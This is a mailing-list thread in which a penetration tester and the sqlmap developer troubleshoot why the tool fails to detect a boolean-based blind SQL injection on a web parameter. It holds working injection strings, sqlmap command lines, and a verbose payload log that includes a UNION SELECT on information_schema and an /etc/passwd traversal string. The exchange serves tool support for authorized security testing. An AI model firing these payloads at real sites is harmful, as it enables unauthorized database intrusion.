Curious, have you tried using the --prefix and --suffix options to frame
your injection to see if that helps?
On Wed, Apr 29, 2015 at 2:10 AM, Alistair Johnson <amcljohn...@gmail.com>
wrote:
> OK. You're right in that the following lines in your dummy output
> should produce discernable responses when tested against the
> application:
> PackageSelection' AND 1595=1103 AND 'cBLQ'='cBLQ
> PackageSelection' AND 1559=1559 AND 'uIvd'='uIvd
>
> I've verified this manually. Thanks and I'll send you the traffic output
> file.
>
> Cheers,
>
> Alistair.
>
> On Wed, Apr 29, 2015 at 4:57 PM, Miroslav Stampar
> <miroslav.stam...@gmail.com> wrote:
> > I would say that you screwed something up. Can you please send that
> traffic
> > file I requested.
> >
> > Down below find a line that says: "[08:55:08] [PAYLOAD] PackageSelection'
> > AND 1595=1103 AND 'cBLQ'='cBLQ". That is the proof that your claims are
> > invalid.
> >
> > $ python sqlmap.py -u
> www.site.com/help/UserGuide.aspx?Sec=PackageSelection
> > --dummy -v 3
> > _
> > ___ ___| |_____ ___ ___ {1.0-dev-03f32ae}
> > |_ -| . | | | .'| . |
> > |___|_ |_|_|_|_|__,| _|
> > |_| |_| http://sqlmap.org
> >
> > [!] legal disclaimer: Usage of sqlmap for attacking targets without prior
> > mutual consent is illegal. It is the end user's responsibility to obey
> all
> > applicable local, state and federal laws. Developers assume no liability
> and
> > are not responsible for any misuse or damage caused by this program
> >
> > [*] starting at 08:55:05
> >
> > [08:55:05] [DEBUG] cleaning up configuration parameters
> > [08:55:05] [DEBUG] setting the HTTP timeout
> > [08:55:05] [DEBUG] creating HTTP requests opener object
> > [08:55:05] [DEBUG] heuristically checking if the target is protected by
> some
> > kind of WAF/IPS/IDS
> > [08:55:05] [PAYLOAD] WVJJ=8692 AND 1=1 UNION ALL SELECT 1,2,3,table_name
> > FROM information_schema.tables WHERE 2>1-- ../../../etc/passwd
> > [08:55:05] [DEBUG] setting match ratio for current parameter to 0.743
> > [08:55:05] [INFO] testing if the target URL is stable. This can take a
> > couple of seconds
> > [08:55:06] [WARNING] target URL is not stable. sqlmap will base the page
> > comparison on a sequence matcher. If no dynamic nor injectable parameters
> > are detected, or in case of junk results, refer to user's manual
> paragraph
> > 'Page comparison' and provide a string or regular expression to match on
> > how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit]
> > [08:55:08] [INFO] searching for dynamic content
> > [08:55:08] [DEBUG] setting match ratio for current parameter to 0.446
> > [08:55:08] [CRITICAL] target URL is heavily dynamic. sqlmap is going to
> > retry the request
> > [08:55:08] [INFO] searching for dynamic content
> > [08:55:08] [INFO] testing if GET parameter 'Sec' is dynamic
> > [08:55:08] [PAYLOAD] 2485
> > [08:55:08] [DEBUG] setting match ratio for current parameter to 0.867
> > [08:55:08] [INFO] confirming that GET parameter 'Sec' is dynamic
> > [08:55:08] [PAYLOAD] 8682
> > [08:55:08] [INFO] GET parameter 'Sec' is dynamic
> > [08:55:08] [PAYLOAD] PackageSelection)"'.)"").'
> > [08:55:08] [WARNING] heuristic (basic) test shows that GET parameter
> 'Sec'
> > might not be injectable
> > [08:55:08] [PAYLOAD] PackageSelection'LcAd<'">Hovs
> > [08:55:08] [INFO] testing for SQL injection on GET parameter 'Sec'
> > [08:55:08] [INFO] testing 'AND boolean-based blind - WHERE or HAVING
> clause'
> > [08:55:08] [PAYLOAD] PackageSelection) AND 4774=3078 AND (8643=8643
> > [08:55:08] [DEBUG] setting match ratio for current parameter to 0.833
> > [08:55:08] [PAYLOAD] PackageSelection) AND 1559=1559 AND (3186=3186
> > [08:55:08] [PAYLOAD] PackageSelection AND 8581=4897
> > [08:55:08] [DEBUG] setting match ratio for current parameter to 0.851
> > [08:55:08] [PAYLOAD] PackageSelection AND 1559=1559
> > [08:55:08] [PAYLOAD] PackageSelection') AND 6273=6522 AND ('YHvu'='YHvu
> > [08:55:08] [DEBUG] setting match ratio for current parameter to 0.554
> > [08:55:08] [PAYLOAD] PackageSelection') AND 1559=1559 AND ('sTiQ'='sTiQ
> > [08:55:08] [PAYLOAD] PackageSelection') AND 3601=4813 AND ('ParN'='ParN
> > [08:55:08] [PAYLOAD] PackageSelection' AND 1595=1103 AND 'cBLQ'='cBLQ
> > [08:55:08] [DEBUG] setting match ratio for current parameter to 0.745
> > [08:55:08] [PAYLOAD] PackageSelection' AND 1559=1559 AND 'uIvd'='uIvd
> > [08:55:08] [PAYLOAD] PackageSelection' AND 8619=5317 AND 'RtrE'='RtrE
> > [08:55:08] [PAYLOAD] PackageSelection%' AND 3991=4465 AND '%'='
> > [08:55:08] [DEBUG] setting match ratio for current parameter to 0.495
> > [08:55:08] [PAYLOAD] PackageSelection%' AND 1559=1559 AND '%'='
> > [08:55:08] [PAYLOAD] PackageSelection%' AND 5263=7541 AND '%'='
> > [08:55:08] [PAYLOAD] PackageSelection AND 8168=8736-- pZYt
> > [08:55:08] [DEBUG] setting match ratio for current parameter to 0.685
> > [08:55:08] [PAYLOAD] PackageSelection AND 1559=1559-- NfAy
> > ...
> >
> > On Tue, Apr 28, 2015 at 3:15 PM, Alistair Johnson <amcljohn...@gmail.com
> >
> > wrote:
> >>
> >> Hi Brandon,
> >>
> >> Thanks for your comment. Confirming that i've tried risk=3 with
> >> level=5 with the same results. I've looked more closely at the
> >> requests that sqlmap is sending to check if the parameter is
> >> injectable. It is testing the Sec paramater with values such as:
> >>
> >> PackageSelection) AND 1477=7114
> >> PackageSelection) AND 1631=1631
> >> PackageSelection') AND 5603=7729
> >> PackageSelection') AND 1631=1631
> >> PackageSelection' AND 3943=9381
> >> PackageSelection' AND 1631=1631
> >> PackageSelection" AND 3324=4690
> >> PackageSelection" AND 1631=1631
> >> PackageSelection) AND 4734=6616 AND (6346=6346
> >> PackageSelection)) AND 7350=9272 AND (8861=8861
> >>
> >> When in fact, i assume it would need to use logic like I used to get
> >> distinguishable responses:
> >>
> >> PackageSelection (returns response A)
> >> PackageSelection' AND '1'='1 (returns response A)
> >> PackageSelection' AND '1'='2 (returns response B)
> >>
> >> In a nutshell, it doesn't appear to be trying single quotes and values
> >> in the ' AND '1'='1 pattern. But i would have thought this is a pretty
> >> typical format for checking boolean-based blind SQLi.
> >>
> >> Cheers,
> >>
> >> Alistair.
> >>
> >> On Tue, Apr 28, 2015 at 10:36 PM, Brandon Perry
> >> <bperry.volat...@gmail.com> wrote:
> >> > It's a GET, so there wouldn't be a content type, unless I am mistaken.
> >> >
> >> > Alistair, have you tried --risk=3 with --level=5 yet?
> >> >
> >> > Sent from a phone
> >> >
> >> > On Apr 28, 2015, at 7:13 AM, Miroslav Stampar
> >> > <miroslav.stam...@gmail.com>
> >> > wrote:
> >> >
> >> > Can you please send the unredacted content of request.txt to my
> address?
> >> >
> >> > If not, then please at least send me the content of traffic file which
> >> > you
> >> > can obtain by just appending the "-t traffic.txt" to the regular
> >> > sqlmap's
> >> > run.
> >> >
> >> > Bye
> >> >
> >> > On Tue, Apr 28, 2015 at 2:10 PM, Alistair Johnson
> >> > <amcljohn...@gmail.com>
> >> > wrote:
> >> >>
> >> >> Thanks for the quick reply.
> >> >>
> >> >> The contents of the request file are as follows:
> >> >>
> >> >> GET /help/UserGuide.aspx?Sec=PackageSelection HTTP/1.1
> >> >> Host: <redacted>
> >> >> Accept: */*
> >> >> Accept-Language: en
> >> >> User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64;
> >> >> x64; Trident/5.0)
> >> >> Connection: close
> >> >> Referer: <redacted>
> >> >> Cookie: <redacted>
> >> >>
> >> >> I've redacted some of the details as it's not appropriate to draw
> >> >> attention to an internet facing application's SQLi vulnerability.
> >> >>
> >> >> When providing the request file as part of the following command:
> >> >> sqlmap -r '<request file>' -p 'Sec' --dbms 'Microsoft SQL Server'
> >> >> --level=4 --proxy=http://127.0.0.1:8080 --technique=B --string
> >> >> 'industries' -v 1
> >> >>
> >> >> sqlmap executes as normal but cannot identify (and therefore cannot
> >> >> exploit) the boolean-based blind vulnerability which I've verified
> >> >> manually.
> >> >>
> >> >> Thanks again,
> >> >>
> >> >> Al.
> >> >>
> >> >>
> >> >> On Tue, Apr 28, 2015 at 9:59 PM, Miroslav Stampar
> >> >> <miroslav.stam...@gmail.com> wrote:
> >> >> > And what is the content of request file?
> >> >> >
> >> >> > Bye
> >> >> >
> >> >> > On Tue, Apr 28, 2015 at 1:03 PM, Alistair Johnson
> >> >> > <amcljohn...@gmail.com>
> >> >> > wrote:
> >> >> >>
> >> >> >> Hi sqlmappers,
> >> >> >>
> >> >> >> I'm a fairly experienced user of sqlmap having used it extensively
> >> >> >> in
> >> >> >> the past. I came across what appeared to pretty typical
> >> >> >> boolean-based
> >> >> >> blind SQLi in an application I'm (legally) testing. However, for
> the
> >> >> >> first time, I'm unable to get sqlmap to recognise the parameter as
> >> >> >> vulnerable to exploit it further. And as we know, manually
> >> >> >> exploiting
> >> >> >> blind SQLi is cumbersome to say the least.
> >> >> >>
> >> >> >> Here is a summary of the requests i've made to manually confirm
> the
> >> >> >> vulnerability.
> >> >> >>
> >> >> >> /help/UserGuide.aspx?Sec=PackageSelection (returns response A)
> >> >> >> /help/UserGuide.aspx?Sec=PackageSelection'+and+'1'='1 (returns
> >> >> >> response
> >> >> >> A)
> >> >> >> /help/UserGuide.aspx?Sec=PackageSelection'+and+'1'='2 (returns
> >> >> >> response
> >> >> >> B)
> >> >> >>
> >> >> >> I've tried various sqlmap flags and thought the following command
> >> >> >> would give me the best chance of success:
> >> >> >>
> >> >> >> sqlmap -r '<request file>' -p 'Sec' --dbms 'Microsoft SQL Server'
> >> >> >> --level=4 --proxy=http://127.0.0.1:8080 --technique=B --string
> >> >> >> 'industries' -v 1
> >> >> >>
> >> >> >> Note: the string 'industries' is text that appears in response A
> but
> >> >> >> not response B.
> >> >> >>
> >> >> >> I've looked at the requests that sqlmap is sending in the
> background
> >> >> >> (proxied through burp). It appears that it's attempting to exploit
> >> >> >> this with the AND statement as it should but is not using single
> >> >> >> quotes as per my example above.
> >> >> >>
> >> >> >> I'd appreciate any insight. If this is a shortcoming in sqlmap,
> i'd
> >> >> >> be
> >> >> >> more than happy to contribute some time to improve it so it can
> >> >> >> identify injectable parameters such as these in the future.
> >> >> >>
> >> >> >> Thanks,
> >> >> >>
> >> >> >> Al.
> >> >> >>
> >> >> >>
> >> >> >>
> >> >> >>
> >> >> >>
> ------------------------------------------------------------------------------
> >> >> >> One dashboard for servers and applications across
> >> >> >> Physical-Virtual-Cloud
> >> >> >> Widest out-of-the-box monitoring support with 50+ applications
> >> >> >> Performance metrics, stats and reports that give you Actionable
> >> >> >> Insights
> >> >> >> Deep dive visibility with transaction tracing using APM Insight.
> >> >> >> http://ad.doubleclick.net/ddm/clk/290420510;117567292;y
> >> >> >> _______________________________________________
> >> >> >> sqlmap-users mailing list
> >> >> >> sqlmap-users@lists.sourceforge.net
> >> >> >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
> >> >> >
> >> >> >
> >> >> >
> >> >> >
> >> >> > --
> >> >> > Miroslav Stampar
> >> >> > http://about.me/stamparm
> >> >
> >> >
> >> >
> >> >
> >> > --
> >> > Miroslav Stampar
> >> > http://about.me/stamparm
> >> >
> >> >
> >> >
> ------------------------------------------------------------------------------
> >> > One dashboard for servers and applications across
> Physical-Virtual-Cloud
> >> > Widest out-of-the-box monitoring support with 50+ applications
> >> > Performance metrics, stats and reports that give you Actionable
> Insights
> >> > Deep dive visibility with transaction tracing using APM Insight.
> >> > http://ad.doubleclick.net/ddm/clk/290420510;117567292;y
> >> >
> >> > _______________________________________________
> >> > sqlmap-users mailing list
> >> > sqlmap-users@lists.sourceforge.net
> >> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users
> >
> >
> >
> >
> > --
> > Miroslav Stampar
> > http://about.me/stamparm
>
>
> ------------------------------------------------------------------------------
> One dashboard for servers and applications across Physical-Virtual-Cloud
> Widest out-of-the-box monitoring support with 50+ applications
> Performance metrics, stats and reports that give you Actionable Insights
> Deep dive visibility with transaction tracing using APM Insight.
> http://ad.doubleclick.net/ddm/clk/290420510;117567292;y
> _______________________________________________
> sqlmap-users mailing list
> sqlmap-users@lists.sourceforge.net
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
------------------------------------------------------------------------------
One dashboard for servers and applications across Physical-Virtual-Cloud
Widest out-of-the-box monitoring support with 50+ applications
Performance metrics, stats and reports that give you Actionable Insights
Deep dive visibility with transaction tracing using APM Insight.
http://ad.doubleclick.net/ddm/clk/290420510;117567292;y
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
